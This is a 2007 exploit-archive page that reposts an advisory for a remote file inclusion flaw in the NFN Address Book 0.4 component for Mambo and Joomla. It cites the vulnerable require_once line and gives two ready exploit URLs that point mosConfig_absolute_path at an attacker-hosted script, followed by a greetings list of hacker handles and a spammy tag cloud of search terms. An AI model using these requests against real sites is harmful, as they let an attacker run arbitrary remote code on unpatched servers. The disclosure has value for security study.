about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo Component nfnaddressbook 0.4 Remote File Inclusion Vulnerability




2007-03-21 Mambo Component nfnaddressbook 0.4 Remote File Inclusion Vulnerability
Rated as : High Risk

######################################################
#
# MAMBO & Joomla NFN Address Book v0.4 (nfnaddressbook.php) Remote File
Include Vulnerabilities
#
######################################################
#
# script :
http://mamboxchange.com/frs/download.php/8191/com_nfn_addressbook.zip
#
######################################################
#
# About : The NFN Address Book manages lists of contacts that can be split
into groups and allows for hiding of private contacts.
#          Unlike other address books it is owned by a Mambo user but the
contacts are NOT Mambo users.
#
######################################################
#
# file :  nfnaddressbook.php
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com ,
http://hack-teach.com/ , Team Hell Crew
#
######################################################
#
# require_once ( $mosConfig_absolute_path . 
'/components/com_'._MISC_DB_PREFIX.'addressbook/functions.php' );
#
######################################################
# Exploit :
#
#   this usege :
http://www.example.com/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=Evil-script?
#
#           or :
http://www.example.com/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=Evil-script?
#
######################################################


----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The
Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| |
020 | | abdulla00 " alz3eem" | | The_Viper |
             All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine
securitydot.net - 2007-03-21

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 03:54:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
chinacons. qoocu.com 1835 www.sexyt phpNuke Www.Video mambo Remo shop.paipa b.f. Aks dokhta php-nuke 2 iraq bebio.com www.+sex+v www.shenno 3gp vedios www.wishcl Invision cortoon se www.cnnit. wwwxnx com free Sex.c sergio eus free Sex.c www.bjycxf moms4fuck server u f www.scipha eklemek Videogalle www.856565 sao os lou safehtml/H phpRaid www.Sex fa phpRaid sexy (vedi http://www Windows 2k tttot www.import paki girl Selebriti guildftpd www.hichf. vb online hot+sex+wo gadis dago www.veryuc www.cddjkj